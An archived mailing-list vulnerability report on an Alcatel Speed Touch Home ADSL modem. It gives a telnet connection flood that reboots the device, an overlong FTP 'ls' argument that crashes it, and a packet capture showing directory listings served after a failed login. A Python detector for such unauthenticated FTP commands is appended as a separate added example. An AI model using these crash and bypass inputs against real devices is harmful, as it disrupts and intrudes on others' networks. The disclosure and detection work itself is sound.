Hi cats n' kittens,

I came across below, but Alcatel is unable to reproduce it they say. I was wondering whether anyone out there could do a quick test and supply me with some results to wave at them (if there indeed is an issue)? Below was tested with a Speed Touch Home modem, which would make these problems LAN/internal ones, but it is my understanding that the Speed Touch Pro has an external ip as well, which could extend the possibilities a bit :)

Anyways, any feedback would be appreciated, on to the problem:

1) My Alcatel Speed Touch Home (GV8BAA3.253 - 997001) ADSL modem seems unable to handle a large number of connections to its telnet daemon. About 10-20 quick concurrent connections will cause the modem to reboot.

2) The size of arguments passed through ftp commands to the ftp server seems to be unchecked. This also allows someone to crash/reboot the modem:

    $ ftp 10.0.0.138
    Connected to 10.0.0.138.
    220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
    User (10.0.0.138:(none)): guest
    331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
    Password:
    530 Invalid password
    Login failed
    ls aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
    aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Interesting part here is that even though the login fails, it appears possible to pass the command to the server. It seems there is a problem with the ftp daemon's authentication scheme, below test would appear to support that as well:

3) I have a sniffer running on the wire, listening for all traffic to and from the box's internal ip 10.0.0.150. The modem has ip 10.0.0.138. I log in with user/pass guest/guest, which are invalid for the modem.

    $ ftp 10.0.0.138
    Connected to 10.0.0.138.
    220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
    User (10.0.0.138:(none)): guest
    331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
    Password:
    530 Invalid password
    Login failed
    ls
    200 Connected to 10.0.0.150 port 2681
    530 Unknown user

So far so good, I'm not allowed the listing, since I'm not properly logged in. However, the packetlog (NGSSniff) reveals the following:

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 74
      Identifier: 27510
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xfa18
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 21
      Dest port: 2675
      Sequence: 3435584144
      ack: 1451021190
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 4096
      Checksum: 0xb3ac
      Urgent Pointer: 0
    Raw Data
      35 33 30 20 49 6e 76 61 6c 69 64 20 70 61 73 73 (530 Invalid pass)
      77 6f 72 64 0d 0a                               (word )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 76
      Identifier: 58979
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0x7f29
      Source IP: 10.0.0.150
      Dest IP: 10.0.0.138
    TCP Header
      Source port: 2675
      Dest port: 21
      Sequence: 1451021190
      ack: 3435584166
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 64076
      Checksum: 0x493d
      Urgent Pointer: 0
    Raw Data
      50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 35 30 2c (PORT 10,0,0,150,)
      31 30 2c 31 31 36 0d 0a                         (10,116 )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 91
      Identifier: 27520
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xf9fd
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 21
      Dest port: 2675
      Sequence: 3435584166
      ack: 1451021214
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 4096
      Checksum: 0x31c4
      Urgent Pointer: 0
    Raw Data
      32 30 30 20 43 6f 6e 6e 65 63 74 65 64 20 74 6f (200 Connected to)
      20 31 30 2e 30 2e 30 2e 31 35 30 20 70 6f 72 74 ( 10.0.0.150 port)
      20 32 36 37 36 0d 0a                            ( 2676 )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 58
      Identifier: 58992
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0x7f2e
      Source IP: 10.0.0.150
      Dest IP: 10.0.0.138
    TCP Header
      Source port: 2675
      Dest port: 21
      Sequence: 1451021214
      ack: 3435584205
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 64037
      Checksum: 0xeac1
      Urgent Pointer: 0
    Raw Data
      4e 4c 53 54 0d 0a                               (NLST )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 70
      Identifier: 27522
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xfa10
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 21
      Dest port: 2675
      Sequence: 3435584205
      ack: 1451021220
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 4096
      Checksum: 0x97b8
      Urgent Pointer: 0
    Raw Data
      35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
      0d 0a                                           ( )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 61
      Identifier: 27523
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xfa18
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 20
      Dest port: 2676
      Sequence: 3436864002
      ack: 1453411572
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 4096
      Checksum: 0x12c8
      Urgent Pointer: 0
    Raw Data
      74 6f 74 61 6c 20 31 0d 0a                      (total 1 )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 101
      Identifier: 27524
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xf9ef
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 20
      Dest port: 2676
      Sequence: 3436864011
      ack: 1453411572
      Header length: 0x80
      Flags: 0x19 (ACK PSH FIN )
      Window Size: 4096
      Checksum: 0xdff8
      Urgent Pointer: 0
    Raw Data
      61 63 74 69 76 65 0d 0a 64 6c 0d 0a 73 74 61 72 (active dl star)
      74 75 70 2e 63 6d 64 0d 0a 47 56 38 41 41 41 31 (tup.cmd GV8AAA1)
      2e 30 30 30 0d 0a 6d 6f 75 6e 74 2e 63 6d 64 0d (.000 mount.cmd )
      0a                                              ( )

    IP Header
      Length and version: 0x45
      Type of service: 0x00
      Total length: 132
      Identifier: 27525
      Flags: 0x0000
      TTL: 64
      Protocol: 6 (TCP)
      Checksum: 0xf9cf
      Source IP: 10.0.0.138
      Dest IP: 10.0.0.150
    TCP Header
      Source port: 21
      Dest port: 2675
      Sequence: 3435584205
      ack: 1451021220
      Header length: 0x80
      Flags: 0x18 (ACK PSH )
      Window Size: 4096
      Checksum: 0xe525
      Urgent Pointer: 0
    Raw Data
      35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
      0d 0a 31 35 30 20 4f 70 65 6e 69 6e 67 20 64 61 ( 150 Opening da)
      74 61 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 6f (ta connection fo)
      72 20 2f 62 69 6e 2f 6c 73 0d 0a 32 32 36 20 30 (r /bin/ls 226 0)
      20 6d 61 74 63 68 65 73 20 74 6f 74 61 6c 0d 0a ( matches total )

It seems the 'ls' is still executed anyways and that the ftp client (Win2k ftp.exe) is just withholding the information from me in some way. Above IS effectively a listing of my modem's ftp "root".

Any thoughts/comments/similar (or different) results? Much obliged :)

Cheers,
Thejian

--
Best regards,
Strumpf Noir Society
mailto:vuln-devat_private

"Mere accumulation of observational evidence is not proof."
-- Death, "The Hogfather"
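As an added example (not part of the original post or of any Alcatel tooling), here is a defender-side check for the behaviour the sniffer log shows: it replays a reconstructed FTP control channel and flags any data-transfer command that receives a positive reply while the session has not yet seen a 230 login reply. The sample stream is constructed from the control-channel payloads in the post; the USER/PASS lines are assumed, since the sniffer excerpt starts at the 530 reply.

```python
"""Flag FTP commands a server acted on before any successful login.

Added example, not from the original post. Replays control-channel
payloads as (source_port, payload) pairs, server side on port 21, and
reports auth-required commands that drew a 1xx/2xx reply while no
230 'logged in' reply has been seen, as in the sniffer log above.
"""
import re

# Commands that must never succeed before a 230 login reply.
AUTH_REQUIRED = {"PORT", "PASV", "LIST", "NLST", "RETR", "STOR", "CWD", "DELE"}
REPLY_RE = re.compile(r"^(\d{3})[ -]")

# Constructed sample, transcribed from the control-channel packets in the
# post (USER/PASS lines assumed; Win2k ftp.exe sends them for 'guest').
SAMPLE_STREAM = [
    (2675, "USER guest\r\n"),
    (21, "331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.\r\n"),
    (2675, "PASS guest\r\n"),
    (21, "530 Invalid password\r\n"),
    (2675, "PORT 10,0,0,150,10,116\r\n"),
    (21, "200 Connected to 10.0.0.150 port 2676\r\n"),
    (2675, "NLST\r\n"),
    (21, "530 Unknown user\r\n150 Opening data connection for /bin/ls\r\n"
         "226 0 matches total\r\n"),
]


def find_unauthenticated_commands(stream, server_port=21):
    """Return (command, reply_line) pairs for auth-required commands that
    got a 1xx/2xx reply before a 230 login reply was observed."""
    logged_in = False
    pending = None  # verb of the last client command; kept across replies
    findings = []   # so a 530 followed by 150/226 on the same command shows
    for src_port, payload in stream:
        for line in payload.split("\r\n"):
            if not line:
                continue
            if src_port != server_port:
                pending = line.split(" ", 1)[0].upper()
                continue
            m = REPLY_RE.match(line)
            if not m:
                continue
            code = m.group(1)
            if code == "230":
                logged_in = True
            elif pending in AUTH_REQUIRED and not logged_in and code[0] in "12":
                findings.append((pending, line))
    return findings


if __name__ == "__main__":
    for cmd, reply in find_unauthenticated_commands(SAMPLE_STREAM):
        print(f"ALERT: {cmd} accepted before login -> {reply}")
```

The same check can be run over any reassembled FTP control stream (for instance from tcpflow output) to confirm whether a daemon honours its own 530.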
This archive was generated by hypermail 2b30 : Thu Feb 21 2002 - 15:00:03 PST